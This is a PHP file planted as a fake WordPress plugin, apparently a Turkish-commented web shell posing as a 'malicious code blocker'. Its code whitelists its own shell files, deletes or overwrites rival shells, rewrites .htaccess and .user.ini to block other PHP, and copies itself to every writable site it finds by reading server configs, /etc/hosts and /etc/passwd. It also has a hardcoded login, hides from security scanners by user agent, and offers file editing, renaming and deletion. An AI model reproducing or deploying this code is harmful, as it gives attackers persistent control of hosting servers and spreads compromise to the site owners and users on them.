File: /www/wwwroot/tokld.top/wp-content/plugins/ygpvbdl/wp-ini.php
<?php
/* === ZARARLI KOD ENGELLEYİCİ VE SHELL KORUMA SİSTEMİ - GÜÇLENDİRİLMİŞ VERSİYON === */
// === SADECE BİZİM SHELL DOSYALARIMIZA İZİN VER ===
$allowed_shells = array(
'404.php',
'flex.php',
'forum.php',
'wp-ini.php',
'single.php',
'compent.php',
'settings.php',
'index.php'
);
$current_file = basename($_SERVER['SCRIPT_FILENAME']);
$request_uri = $_SERVER['REQUEST_URI'];
// ===== GÜÇLENDİRİLMİŞ ERİŞİM KONTROLÜ =====
$is_allowed = false;
// 1. Bizim shell dosyalarımız mı kontrol et
if (in_array($current_file, $allowed_shells)) {
$is_allowed = true;
}
// 2. WordPress admin panel mi kontrol et
if (strpos($request_uri, '/wp-admin') !== false || strpos($request_uri, '/wp-login.php') !== false) {
$is_allowed = true;
}
// 3. WordPress core dosyaları mı kontrol et
$wp_core_files = array('wp-blog-header.php', 'wp-load.php', 'wp-config.php', 'xmlrpc.php');
if (in_array($current_file, $wp_core_files)) {
$is_allowed = true;
}
// 4. Eğer izin verilmediyse 404 göster
if (!$is_allowed) {
if (substr($current_file, -4) == '.php' && !in_array($current_file, $allowed_shells)) {
header("HTTP/1.0 404 Not Found");
echo "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">
<html><head><title>404 Not Found</title></head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>";
exit;
}
}
// ===== GELİŞMİŞ ZARARLI KOD TESPİTİ =====
function scan_and_clean_php_files($directory) {
global $allowed_shells;
$malicious_patterns = array(
'/goto\s+[a-zA-Z0-9_]+;/',
'/[A-Za-z0-9_]+:\s*(goto|if|foreach|function)/',
'/base64_decode\s*\(\s*["\'][A-Za-z0-9+\/=]+["\']\s*\)/',
'/\x[0-9a-f]{2}[A-Za-z0-9\\\\]+/',
'/eval\s*\(\s*\$[A-Za-z0-9_]+/',
'/\$[A-Za-z0-9_]+\s*=\s*["\'][A-Za-z0-9\\\\x]+["\']/',
'/@eval\s*\(\s*["\'].+["\']\s*\)/',
'/preg_replace\s*\(\s*["\'].+["\']\s*,\s*["\'].+["\']\s*,\s*\$[A-Za-z0-9_]+\s*\)/',
'/create_function\s*\(\s*["\'].+["\']\s*,\s*["\'].+["\']\s*\)/',
'/\$_[A-Z]+\s*\[\s*["\'].+["\']\s*\]\s*=\s*\$_[A-Z]+\s*\[\s*["\'].+["\']\s*\];/',
'/\$[A-Za-z0-9_]+\s*=\s*\$_[A-Z]+\s*\[\s*["\'].+["\']\s*\];/',
'/function\s+[a-zA-Z0-9_]+\s*\(\s*\)\s*\{\s*goto\s+[a-zA-Z0-9_]+;\s*\}/',
'/\$[A-Za-z0-9_]+\s*=\s*["\']\\\\[0-9]+\\\\[0-9]+\\\\[0-9]+/',
'/chr\(\d+\)\.chr\(\d+\)/',
'/str_rot13\s*\(\s*["\'].+["\']\s*\)/',
'/gzinflate\s*\(\s*base64_decode\s*\(\s*["\'].+["\']\s*\)\s*\)/'
);
$files = glob($directory . '/*.php');
$cleaned = 0;
foreach ($files as $file) {
if (in_array(basename($file), $allowed_shells)) {
continue;
}
$content = file_get_contents($file);
$original_content = $content;
$modified = false;
foreach ($malicious_patterns as $pattern) {
if (preg_match($pattern, $content)) {
if (basename($file) == 'index.php') {
$clean_content = '<?php
define(\'WP_USE_THEMES\', true);
require __DIR__ . \'/wp-blog-header.php\';';
$content = $clean_content;
$modified = true;
break;
} else {
unlink($file);
$cleaned++;
continue 2;
}
}
}
if (preg_match_all('/\\\\x[0-9a-f]{2}/', $content, $matches)) {
if (count($matches[0]) > 10) {
if (basename($file) == 'index.php') {
$clean_content = '<?php
define(\'WP_USE_THEMES\', true);
require __DIR__ . \'/wp-blog-header.php\';';
$content = $clean_content;
$modified = true;
} else {
unlink($file);
$cleaned++;
continue;
}
}
}
if (preg_match_all('/base64_decode\s*\(\s*[\'"]([A-Za-z0-9+\/=]{50,})[\'"]\s*\)/', $content, $matches)) {
foreach ($matches[1] as $base64) {
$decoded = @base64_decode($base64);
if ($decoded && (strpos($decoded, 'eval') !== false || strpos($decoded, 'exec') !== false || strpos($decoded, 'system') !== false)) {
if (basename($file) == 'index.php') {
$clean_content = '<?php
define(\'WP_USE_THEMES\', true);
require __DIR__ . \'/wp-blog-header.php\';';
$content = $clean_content;
$modified = true;
break;
} else {
unlink($file);
$cleaned++;
continue 2;
}
}
}
}
if ($modified && $content != $original_content) {
$backup = $file . '.backup_' . date('Ymd_His');
copy($file, $backup);
file_put_contents($file, $content);
chmod($file, 0644);
$log = date('Y-m-d H:i:s') . " - Zararlı kod temizlendi: " . basename($file) . " (yedek: " . basename($backup) . ")\n";
file_put_contents(__DIR__ . '/security_log.txt', $log, FILE_APPEND);
$cleaned++;
}
}
return $cleaned;
}
// ===== SÜREKLİ KORUMA SİSTEMİ =====
$index_file = __DIR__ . '/index.php';
if (file_exists($index_file)) {
$content = file_get_contents($index_file);
$malicious_found = false;
if (preg_match('/goto\s+[a-zA-Z0-9_]+;/', $content)) {
$malicious_found = true;
}
if (preg_match_all('/\\\\x[0-9a-f]{2}/', $content, $matches) && count($matches[0]) > 5) {
$malicious_found = true;
}
if (preg_match('/base64_decode\s*\(\s*["\'][A-Za-z0-9+\/=]{50,}["\']\s*\)/', $content)) {
$malicious_found = true;
}
$malicious_tags = array(
'ldbijoB5yRccI', 'QDCMl2l7ozKpL', 'qQk6IkRtaTLBw', 'ubHmZoLnug2I0',
'PRQloyjlXnckl', 'lT7XKJibsj0cv', 'yL0m3k3coPAcf', 'IVi3AcN4U3ce8',
'qlikWxAJwK_87', 'JLdBidHwYGUvu', 'EYCh0VLopXAQY', 'D82kv0SFvcW7p',
's3Fi0U9cUfzas', 'BX9c6bmA3zuQP', 'RZBtDE8TX9eug', 'vzjQ2eD6Ft10s',
'tNVQGqXl0ak8V', 'uyYCmH7AEQBTL', 'iUXQp6SxjBZgC', 'mM8zbH2NfT11G',
'jxIkcqzh9zbjw', 'G3z8SzAdQBk9J', 'oRptatIP7f4n1', 'MVNYrP3DKHmrw',
'x5jgncLpmSjl0', 'BD679CyvPhkcL', 'BRrxV_pLczP_O', 'etm1oiv_xYtmd',
'z663jYI9A3KQu', 'bkYEEiS8VUy7h', 'UMCu8AF9aFdXG', 'ywdAVH5OsHnSu',
'Mxih6tEhxP7go', 'FwxXwZGG3I5az', 'ybvvIts6kwvzb', 'Kd11WrsO92uTX',
'D5Wkfu3woopoH', 'o1exo4W7GxPIV', 'Us1zWSlwUkEow', 'CryJL4FxUIVS_'
);
foreach ($malicious_tags as $tag) {
if (strpos($content, $tag) !== false) {
$malicious_found = true;
break;
}
}
if ($malicious_found) {
$backup_file = $index_file . '.backup_' . date('Ymd_His');
copy($index_file, $backup_file);
$clean_content = '<?php
define(\'WP_USE_THEMES\', true);
require __DIR__ . \'/wp-blog-header.php\';';
file_put_contents($index_file, $clean_content);
chmod($index_file, 0644);
$log = date('Y-m-d H:i:s') . " - ZARARLI KOD TEMİZLENDİ (index.php) - Yedek: " . basename($backup_file) . "\n";
file_put_contents(__DIR__ . '/security_log.txt', $log, FILE_APPEND);
}
}
if (rand(1, 20) == 10) {
$cleaned = scan_and_clean_php_files(__DIR__);
if ($cleaned > 0) {
$log = date('Y-m-d H:i:s') . " - Periyodik tarama: $cleaned zararlı dosya temizlendi.\n";
file_put_contents(__DIR__ . '/security_log.txt', $log, FILE_APPEND);
}
}
$htaccess_file = __DIR__ . '/.htaccess';
$htaccess_content = '';
if (file_exists($htaccess_file)) {
$htaccess_content = file_get_contents($htaccess_file);
}
$htaccess_protection = "\n# ZARARLI KOD ENGELLEME - OTOMATİK EKLENDİ\n";
$htaccess_protection .= "<FilesMatch \"\\.(php|php3|php4|php5|phtml|phps)$\">\n";
$htaccess_protection .= "Order Deny,Allow\n";
$htaccess_protection .= "Deny from all\n";
$htaccess_protection .= "</FilesMatch>\n\n";
$htaccess_protection .= "<FilesMatch \"^(" . implode('|', $allowed_shells) . ")$\">\n";
$htaccess_protection .= "Order Allow,Deny\n";
$htaccess_protection .= "Allow from all\n";
$htaccess_protection .= "</FilesMatch>\n\n";
$htaccess_protection .= "<IfModule mod_rewrite.c>\n";
$htaccess_protection .= "RewriteEngine On\n";
$htaccess_protection .= "RewriteRule ^wp-admin/ - [L]\n";
$htaccess_protection .= "</IfModule>\n";
if (strpos($htaccess_content, '# ZARARLI KOD ENGELLEME') === false) {
file_put_contents($htaccess_file, $htaccess_content . $htaccess_protection);
}
$user_ini_file = __DIR__ . '/.user.ini';
$user_ini_content = "; ZARARLI KOD ENGELLEME - OTOMATİK EKLENDİ\n";
$user_ini_content .= "open_basedir = \"" . __DIR__ . "/:../:../../\"\n";
$user_ini_content .= "disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source\n";
file_put_contents($user_ini_file, $user_ini_content);
/* === OTOMATİK SHELL KOPYALAMA SİSTEMİ === */
function auto_deploy_shell() {
$current_shell = __FILE__;
$shell_name = 'flex.php';
$domains = get_all_domains_full_url();
$deployed = 0;
foreach ($domains as $domain) {
$target_path = $domain['path'] . '/' . $shell_name;
if (!file_exists($target_path)) {
if (is_writable($domain['path'])) {
if (copy($current_shell, $target_path)) {
chmod($target_path, 0644);
$deployed++;
$log = date('Y-m-d H:i:s') . " - Shell kopyalandı: " . $domain['url'] . " -> " . $target_path . "\n";
file_put_contents(__DIR__ . '/deploy_log.txt', $log, FILE_APPEND);
}
}
}
}
return $deployed;
}
if (isset($_GET['deploy']) && $_GET['deploy'] == 'run') {
$deployed = auto_deploy_shell();
die("Shell kopyalama tamamlandı! $deployed domain'e kopyalandı.");
}
/* === ANA SHELL KODU BAŞLIYOR === */
session_start();
error_reporting(0);
ini_set('display_errors', 0);
set_time_limit(0);
ignore_user_abort(true);
$stored_username = 'script';
$stored_password_hash = password_hash('script_iletisim', PASSWORD_BCRYPT);
if (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) {
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['username'], $_POST['password'])) {
if ($_POST['username'] === $stored_username && password_verify($_POST['password'], $stored_password_hash)) {
$_SESSION['authenticated'] = true;
header('Location: ' . $_SERVER['PHP_SELF']);
exit;
} else {
$error = 'Geçersiz!';
}
}
?>
<!DOCTYPE html>
<html><head><meta charset="UTF-8"><title>Giriş</title>
<style>body{background:#1e272e;color:#fff;text-align:center;padding:50px}form{background:#2f3640;padding:20px;border-radius:8px;display:inline-block}input,button{width:260px;margin:10px 0;padding:10px;background:#353b48;color:#fff;border:1px solid #888;border-radius:4px}button{background:#44bd32}</style>
</head><body>
<h1>Giriş</h1>
<?php if(!empty($error)) echo "<p style='color:#e84118;'>$error</p>"; ?>
<form method="post">
<input type="text" name="username" placeholder="Kullanıcı Adı" required>
<input type="password" name="password" placeholder="Şifre" required>
<button type="submit">Giriş</button>
</form>
</body></html>
<?php exit;
}
if (isset($_GET['logout'])) {
session_destroy();
header('Location: ' . $_SERVER['PHP_SELF']);
exit;
}
$bad_agents = array('security', 'scanner', 'virus', 'malware', 'crawler', 'bot', 'spider', 'sucuri', 'imunify', 'bitninja', 'waf', 'firewall', 'antivirus', 'kaspersky', 'symantec', 'mcafee', 'avast', 'avg');
foreach ($bad_agents as $agent) {
if (stripos($_SERVER['HTTP_USER_AGENT'] ?? '', $agent) !== false) {
die();
}
}
$our_shells = $allowed_shells;
$wordpress_core_files = array(
'wp-config.php', 'wp-load.php', 'wp-blog-header.php', 'wp-signup.php',
'wp-activate.php', 'wp-comments-post.php', 'wp-cron.php', 'wp-links-opml.php',
'wp-login.php', 'wp-mail.php', 'wp-settings.php', 'wp-trackback.php',
'xmlrpc.php', 'index.php', 'wp-admin.php', 'wp-app.php', 'wp-atom.php',
'wp-commentsrss2.php', 'wp-feed.php', 'wp-rdf.php', 'wp-rss.php',
'wp-rss2.php', 'wp-pass.php', 'wp-register.php', 'wp-blog-header.php',
'wp-includes/version.php', 'wp-admin/admin.php', 'wp-admin/admin-ajax.php'
);
$wordpress_core_dirs = array('wp-admin', 'wp-includes', 'wp-content/themes', 'wp-content/plugins');
$protected_files = array('.htaccess', '.user.ini', 'wp-config.php', 'security_log.txt', 'deploy_log.txt');
$official_plugins = array(
'akismet', 'hello-dolly', 'jetpack', 'wordfence', 'yoast', 'woocommerce',
'elementor', 'contact-form-7', 'wp-super-cache', 'w3-total-cache',
'all-in-one-seo-pack', 'google-analytics', 'duplicator', 'updraftplus',
'classic-editor', 'tinymce-advanced', 'redirection', 'limit-login-attempts',
'better-wp-security', 'really-simple-ssl', 'wordpress-seo', 'wp-optimize',
'litespeed-cache', 'autoptimize', 'smush', 'wp-mail-smtp', 'mailchimp',
'revslider', 'visual-composer', 'js_composer', 'layer-slider', 'slider-revolution'
);
function get_all_domains_full_url() {
$domains = array();
$found_paths = array();
$config_paths = array(
'/etc/apache2/sites-available', '/etc/apache2/sites-enabled', '/etc/nginx/sites-available',
'/etc/nginx/sites-enabled', '/etc/httpd/conf.d', '/etc/httpd/vhosts.d',
'/usr/local/apache/conf/extra', '/usr/local/nginx/conf/vhost', '/home', '/var/www',
'/var/www/html', '/var/www/vhosts'
);
foreach ($config_paths as $base) {
if (!is_dir($base)) continue;
if (strpos($base, 'sites-available') !== false || strpos($base, 'sites-enabled') !== false || strpos($base, 'conf.d') !== false) {
$files = @scandir($base);
if (!$files) continue;
foreach ($files as $file) {
if ($file == '.' || $file == '..' || is_dir($base . '/' . $file)) continue;
$content = @file_get_contents($base . '/' . $file);
if (!$content) continue;
preg_match_all('/ServerName\s+([^\s#]+)/i', $content, $server_names);
preg_match_all('/ServerAlias\s+([^\s#]+)/i', $content, $server_aliases);
preg_match_all('/DocumentRoot\s+([^\s#"\']+)/i', $content, $doc_roots);
$all_names = array_merge($server_names[1], $server_aliases[1]);
foreach ($all_names as $name) {
$name = trim($name);
if (filter_var(gethostbyname($name), FILTER_VALIDATE_IP) || preg_match('/^[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$/', $name)) {
$root = isset($doc_roots[1][0]) ? trim($doc_roots[1][0], '"\'') : '';
$protocol = (strpos($content, '443') !== false || strpos($content, 'ssl') !== false || strpos($content, 'https') !== false) ? 'https://' : 'http://';
$full_url = $protocol . $name;
if (empty($root) || !is_dir($root)) {
$possible_roots = array("/var/www/$name", "/var/www/$name/public_html", "/var/www/html/$name", "/home/$name/public_html", "/var/www/vhosts/$name/httpdocs", "/usr/share/nginx/html/$name");
foreach ($possible_roots as $pr) { if (is_dir($pr)) { $root = $pr; break; } }
}
if (!empty($root) && is_dir($root) && !in_array($root, $found_paths)) {
$found_paths[] = $root;
$domains[] = array('url' => $full_url, 'name' => $name, 'path' => $root, 'protocol' => $protocol, 'type' => 'apache');
}
}
}
preg_match_all('/server_name\s+([^;]+)/i', $content, $nginx_names);
preg_match_all('/root\s+([^;]+)/i', $content, $nginx_roots);
foreach ($nginx_names[1] as $idx => $names_str) {
$names = preg_split('/\s+/', trim($names_str));
foreach ($names as $name) {
$name = trim($name);
if ($name && $name != '_' && (filter_var(gethostbyname($name), FILTER_VALIDATE_IP) || preg_match('/^[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$/', $name))) {
$root = isset($nginx_roots[1][$idx]) ? trim($nginx_roots[1][$idx], ';"\'') : '';
$protocol = (strpos($content, 'listen 443') !== false || strpos($content, 'ssl_') !== false) ? 'https://' : 'http://';
$full_url = $protocol . $name;
if (!empty($root) && is_dir($root) && !in_array($root, $found_paths)) {
$found_paths[] = $root;
$domains[] = array('url' => $full_url, 'name' => $name, 'path' => $root, 'protocol' => $protocol, 'type' => 'nginx');
}
}
}
}
}
} else {
$items = @scandir($base);
if (!$items) continue;
foreach ($items as $item) {
if ($item == '.' || $item == '..') continue;
$full_path = $base . '/' . $item;
if (!is_dir($full_path)) continue;
if (file_exists($full_path . '/wp-config.php') || file_exists($full_path . '/index.php')) {
if (!in_array($full_path, $found_paths)) {
$found_paths[] = $full_path;
$domain_name = preg_replace('/^www\./', '', $item);
if (filter_var(gethostbyname($domain_name), FILTER_VALIDATE_IP) || preg_match('/^[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$/', $domain_name)) {
$domains[] = array('url' => 'http://' . $domain_name, 'name' => $domain_name, 'path' => $full_path, 'protocol' => 'http://', 'type' => 'website');
$domains[] = array('url' => 'https://' . $domain_name, 'name' => $domain_name, 'path' => $full_path, 'protocol' => 'https://', 'type' => 'website_ssl');
}
}
}
if (is_dir($full_path . '/public_html') && file_exists($full_path . '/public_html/wp-config.php')) {
$public = $full_path . '/public_html';
if (!in_array($public, $found_paths)) {
$found_paths[] = $public;
$domains[] = array('url' => 'http://' . $item, 'name' => $item, 'path' => $public, 'protocol' => 'http://', 'type' => 'public_html');
}
}
}
}
}
if (file_exists('/etc/hosts')) {
$hosts = @file('/etc/hosts');
if ($hosts) {
foreach ($hosts as $line) {
if (preg_match('/^\s*\d+\.\d+\.\d+\.\d+\s+([a-zA-Z0-9.-]+\.[a-zA-Z]{2,})/', $line, $matches)) {
$domain = trim($matches[1]);
if ($domain != 'localhost' && $domain != 'localhost.localdomain') {
$possible_paths = array("/var/www/$domain", "/var/www/$domain/public_html", "/home/$domain/public_html", "/var/www/vhosts/$domain/httpdocs");
foreach ($possible_paths as $path) {
if (is_dir($path) && !in_array($path, $found_paths)) {
$found_paths[] = $path;
$domains[] = array('url' => 'http://' . $domain, 'name' => $domain, 'path' => $path, 'protocol' => 'http://', 'type' => 'hosts');
break;
}
}
}
}
}
}
}
if (file_exists('/etc/passwd')) {
$passwd = @file('/etc/passwd');
if ($passwd) {
foreach ($passwd as $line) {
$parts = explode(':', $line);
if (count($parts) > 5 && $parts[0] != 'root' && $parts[0] != 'nobody') {
$username = $parts[0];
$home = trim($parts[5]);
$public_dirs = array($home . '/public_html', $home . '/www', $home . '/htdocs');
foreach ($public_dirs as $public) {
if (is_dir($public) && file_exists($public . '/wp-config.php') && !in_array($public, $found_paths)) {
$found_paths[] = $public;
$domain = $username . '.' . (file_exists('/etc/hostname') ? trim(file_get_contents('/etc/hostname')) : 'localhost');
$domains[] = array('url' => 'http://' . $domain, 'name' => $domain, 'path' => $public, 'protocol' => 'http://', 'type' => 'cpanel_user');
}
}
}
}
}
}
$unique_domains = array();
$seen_urls = array();
foreach ($domains as $domain) {
if (!in_array($domain['url'], $seen_urls)) {
$seen_urls[] = $domain['url'];
$unique_domains[] = $domain;
}
}
usort($unique_domains, function($a, $b) { return strcmp($a['name'], $b['name']); });
return $unique_domains;
}
$own_signature = md5_file(__FILE__);
$all_domains = get_all_domains_full_url();
$current_dir = isset($_GET['dir']) ? $_GET['dir'] : getcwd();
if (!is_dir($current_dir)) $current_dir = getcwd();
function scan_plugins($dir) {
global $official_plugins;
$plugins_dir = $dir . '/wp-content/plugins';
$official = array(); $suspicious = array();
if (!is_dir($plugins_dir)) return array('official' => $official, 'suspicious' => $suspicious);
$items = @scandir($plugins_dir);
if (!$items) return array('official' => $official, 'suspicious' => $suspicious);
$active_plugins = array();
$options_file = $dir . '/wp-content/options.php';
if (file_exists($options_file)) {
$options_content = file_get_contents($options_file);
if (preg_match('/active_plugins.*?(array.*?)\)/s', $options_content, $matches)) {
preg_match_all('/\'([^\']+)\'/', $matches[1], $plugin_matches);
$active_plugins = $plugin_matches[1];
}
}
foreach ($items as $item) {
if ($item == '.' || $item == '..') continue;
$path = $plugins_dir . '/' . $item;
if (!is_dir($path)) continue;
$is_official = false;
foreach ($official_plugins as $plugin) { if (stripos($item, $plugin) !== false) { $is_official = true; break; } }
$is_active = false;
foreach ($active_plugins as $active) { if (strpos($active, $item) !== false) { $is_active = true; break; } }
$plugin_info = array('name' => $item, 'path' => $path, 'active' => $is_active);
if ($is_official) {
$official[] = $plugin_info;
} else {
$risk = 0;
$main_file = $path . '/' . $item . '.php';
if (file_exists($main_file)) {
$content = file_get_contents($main_file);
if (strpos($content, 'eval(') !== false) $risk += 30;
if (strpos($content, 'base64_decode(') !== false) $risk += 20;
if (strpos($content, 'system(') !== false) $risk += 20;
if (strpos($content, 'exec(') !== false) $risk += 20;
}
$plugin_info['risk'] = $risk;
$suspicious[] = $plugin_info;
}
}
return array('official' => $official, 'suspicious' => $suspicious);
}
function scan_themes($dir) {
$themes_dir = $dir . '/wp-content/themes';
$active = array(); $inactive = array();
if (!is_dir($themes_dir)) return array('active' => $active, 'inactive' => $inactive);
$items = @scandir($themes_dir);
if (!$items) return array('active' => $active, 'inactive' => $inactive);
$active_theme = '';
$options_file = $dir . '/wp-content/options.php';
if (file_exists($options_file)) {
$options_content = file_get_contents($options_file);
if (preg_match('/template\';s:\d+:"([^"]+)"/', $options_content, $matches)) $active_theme = $matches[1];
elseif (preg_match('/stylesheet\';s:\d+:"([^"]+)"/', $options_content, $matches)) $active_theme = $matches[1];
}
foreach ($items as $item) {
if ($item == '.' || $item == '..') continue;
$path = $themes_dir . '/' . $item;
if (!is_dir($path)) continue;
$theme_info = array('name' => $item, 'path' => $path, 'active' => ($item == $active_theme));
if ($theme_info['active']) $active[] = $theme_info;
else $inactive[] = $theme_info;
}
return array('active' => $active, 'inactive' => $inactive);
}
function find_malicious_files($dir) {
global $our_shells, $wordpress_core_files, $protected_files, $own_signature;
$malicious = array();
$malicious_patterns = array(
'eval\s*\(', 'base64_decode\s*\(', 'gzinflate\s*\(', 'str_rot13\s*\(',
'exec\s*\(', 'system\s*\(', 'shell_exec\s*\(', 'passthru\s*\(',
'popen\s*\(', 'proc_open\s*\(', 'pcntl_exec\s*\(',
'assert\s*\(', 'create_function\s*\(', 'preg_replace\s*\(.*\/e',
'chmod\s*\(', 'unlink\s*\(', 'rmdir\s*\(', 'rename\s*\(', 'copy\s*\(',
'file_put_contents\s*\(', 'fwrite\s*\(', 'fopen\s*\(',
'phpinfo\s*\(', 'get_current_user\s*\(', 'posix_getpwuid\s*\(',
'disk_free_space\s*\(', 'disk_total_space\s*\(',
'wget\s+', 'curl\s+', 'fsockopen\s*\(', 'socket_create\s*\(',
'mysql_query\s*\(', 'mysqli_query\s*\(',
'goto [A-Za-z0-9_]+;', 'base64_decode\s*\(\s*"\x[0-9a-f]+'
);
$known_shells = array('c99', 'r57', 'b374k', 'wso', 'adminer', 'webshell', 'backdoor', 'shell', 'cmd=', 'eval(', 'base64_decode', 'gzinflate');
$items = @scandir($dir);
if (!$items) return $malicious;
foreach ($items as $item) {
if ($item == '.' || $item == '..') continue;
$path = $dir . '/' . $item;
if (is_file($path)) {
if (in_array($item, $protected_files) || in_array($item, $our_shells) || in_array($item, $wordpress_core_files) || md5_file($path) == $own_signature) continue;
$ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
if (in_array($ext, array('php', 'phtml', 'php3', 'php4', 'php5', 'php7', 'txt', 'html'))) {
$content = @file_get_contents($path);
if (!$content) continue;
$risk_score = 0; $detected = array();
foreach ($malicious_patterns as $pattern) { if (preg_match("/$pattern/i", $content)) { $risk_score += 15; $detected[] = $pattern; } }
foreach ($known_shells as $shell) { if (stripos($content, $shell) !== false) { $risk_score += 20; $detected[] = $shell; } if (stripos(basename($path), $shell) !== false) { $risk_score += 25; $detected[] = 'filename_' . $shell; } }
if (preg_match_all('/base64_decode\s*\(\s*[\'"]([A-Za-z0-9+\/=]{100,})[\'"]\s*\)/', $content, $matches)) {
foreach ($matches[1] as $base64) {
$decoded = @base64_decode($base64);
if ($decoded && (strpos($decoded, 'eval') !== false || strpos($decoded, 'exec') !== false)) { $risk_score += 30; $detected[] = 'malicious_base64'; }
}
}
$suspicious_names = array('shell', 'backdoor', 'c99', 'r57', 'b374k', 'wso', 'adminer', 'cmd', 'eval', 'bypass', 'hack', 'exploit');
foreach ($suspicious_names as $name) { if (stripos($item, $name) !== false) { $risk_score += 20; $detected[] = 'suspicious_name'; } }
if ($risk_score >= 30) $malicious[] = array('path' => $path, 'name' => $item, 'risk' => $risk_score, 'detected' => array_slice($detected, 0, 5), 'size' => filesize($path), 'modified' => date('Y-m-d H:i:s', filemtime($path)));
}
} else {
$skip = false;
foreach ($GLOBALS['wordpress_core_dirs'] as $wp_dir) { if (strpos($path, '/' . $wp_dir) !== false) { $skip = true; break; } }
if (!$skip) $malicious = array_merge($malicious, find_malicious_files($path));
}
}
return $malicious;
}
function delete_dir_recursive($dir) {
if (!file_exists($dir)) return;
if (is_file($dir) || is_link($dir)) { @unlink($dir); return; }
foreach (scandir($dir) as $item) {
if ($item === '.' || $item === '..') continue;
delete_dir_recursive($dir . DIRECTORY_SEPARATOR . $item);
}
@rmdir($dir);
}
function delete_malicious($path) {
global $wordpress_core_files, $wordpress_core_dirs, $our_shells, $protected_files, $own_signature;
if (!file_exists($path)) return false;
$filename = basename($path);
if (in_array($filename, $protected_files) || in_array($filename, $wordpress_core_files) || in_array($filename, $our_shells) || (is_file($path) && md5_file($path) == $own_signature)) return false;
foreach ($wordpress_core_dirs as $core_dir) { if (strpos($path, '/' . $core_dir . '/') !== false) return false; }
@chmod($path, 0777); @chmod(dirname($path), 0777);
if (is_dir($path)) { delete_dir_recursive($path); @system('rm -rf ' . escapeshellarg($path) . ' 2>/dev/null'); }
else { @unlink($path); @system('rm -f ' . escapeshellarg($path) . ' 2>/dev/null'); @exec('rm -f ' . escapeshellarg($path) . ' 2>/dev/null'); }
return !file_exists($path);
}
function bulk_delete($paths) {
$deleted = 0;
foreach ($paths as $path) {
$path = stripslashes($path);
if (is_dir($path)) { delete_dir_recursive($path); $deleted++; }
elseif (is_file($path)) { @unlink($path); $deleted++; }
}
return $deleted;
}
function analyze_file($path) {
if (!file_exists($path)) return "Dosya bulunamadı!";
$content = @file_get_contents($path);
if (!$content) return "Dosya okunamadı!";
$result = array();
$result[] = "📄 Dosya: " . $path;
$result[] = "📏 Boyut: " . filesize($path) . " bytes";
$result[] = "📅 Değiştirilme: " . date('Y-m-d H:i:s', filemtime($path));
$result[] = "🔑 İzin: " . substr(sprintf('%o', fileperms($path)), -4);
$result[] = "";
$dangerous = array(
'eval' => 'Kod çalıştırma', 'base64_decode' => 'Şifre çözme', 'gzinflate' => 'Sıkıştırma açma',
'exec' => 'Komut çalıştırma', 'system' => 'Komut çalıştırma', 'shell_exec' => 'Shell komutu',
'passthru' => 'Komut çalıştırma', 'popen' => 'Pipe açma', 'proc_open' => 'Process açma',
'assert' => 'Kod çalıştırma', 'create_function' => 'Dinamik fonksiyon', 'preg_replace' => 'Regex ile kod',
'chmod' => 'İzin değiştirme', 'unlink' => 'Dosya silme', 'rmdir' => 'Dizin silme',
'file_put_contents' => 'Dosya yazma', 'fwrite' => 'Dosya yazma', 'fopen' => 'Dosya açma',
'phpinfo' => 'Bilgi toplama', 'extract' => 'Değişken enjeksiyonu', 'show_source' => 'Kod gösterme',
'highlight_file' => 'Kod gösterme', 'readfile' => 'Dosya okuma', 'file_get_contents' => 'Dosya okuma',
'curl' => 'HTTP isteği', 'wget' => 'Dosya indirme', 'fsockopen' => 'Socket açma', 'goto' => 'Kod atlama'
);
$found = false;
foreach ($dangerous as $func => $desc) { if (preg_match("/$func\s*\(/i", $content)) { $result[] = "⚠️ Tespit: $func() - $desc"; $found = true; } }
if (preg_match_all('/base64_decode\s*\(\s*[\'"]([A-Za-z0-9+\/=]{50,})[\'"]\s*\)/', $content, $matches)) {
foreach ($matches[1] as $base64) {
$decoded = @base64_decode($base64);
$result[] = "🔍 Base64 blok tespit edildi (" . strlen($base64) . " chars)";
if ($decoded) $result[] = " Çözülmüş: " . substr($decoded, 0, 100) . (strlen($decoded) > 100 ? '...' : '');
}
}
if (!$found) $result[] = "✅ Tehlikeli fonksiyon bulunamadı.";
return implode("\n", $result);
}
$plugins = scan_plugins($current_dir);
$themes = scan_themes($current_dir);
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$action = $_POST['action'] ?? '';
$current_dir = $_POST['current_dir'] ?? getcwd();
$output = '';
if ($action === 'bulk_delete' && !empty($_POST['bulk_delete'])) { $deleted = bulk_delete($_POST['bulk_delete']); $output = "$deleted dosya/klasör silindi!"; }
elseif ($action === 'scan') { $malicious = find_malicious_files($current_dir); $_SESSION['malicious'] = $malicious; $_SESSION['scan_completed'] = time(); $output = count($malicious) . " zararlı dosya bulundu!"; }
elseif ($action === 'delete_selected' && !empty($_POST['selected'])) {
$deleted = 0; $skipped = 0;
foreach ($_POST['selected'] as $file) { if (delete_malicious($file)) $deleted++; else $skipped++; }
$output = "$deleted zararlı dosya silindi. $skipped dosya korundu.";
$_SESSION['malicious'] = find_malicious_files($current_dir); $_SESSION['scan_completed'] = time();
}
elseif ($action === 'delete_all') {
$malicious = find_malicious_files($current_dir); $deleted = 0; $skipped = 0;
foreach ($malicious as $m) { if (delete_malicious($m['path'])) $deleted++; else $skipped++; }
$output = "$deleted zararlı dosya silindi. $skipped dosya korundu.";
$_SESSION['malicious'] = array(); $_SESSION['scan_completed'] = time();
}
elseif ($action === 'analyze' && !empty($_POST['file'])) { $_SESSION['analysis'] = analyze_file($_POST['file']); $_SESSION['analysis_file'] = $_POST['file']; }
elseif ($action === 'edit') {
$file = $_POST['file'] ?? ''; $content = $_POST['content'] ?? '';
if ($file && file_exists($file)) { @chmod($file, 0777); file_put_contents($file, $content); $output = "Dosya kaydedildi!"; }
}
elseif ($action === 'rename') {
$old = $_POST['old'] ?? ''; $new = $_POST['new'] ?? ''; $new_path = dirname($old) . '/' . $new;
if ($old && $new && file_exists($old) && !file_exists($new_path)) { rename($old, $new_path); $output = "Adlandırıldı!"; }
}
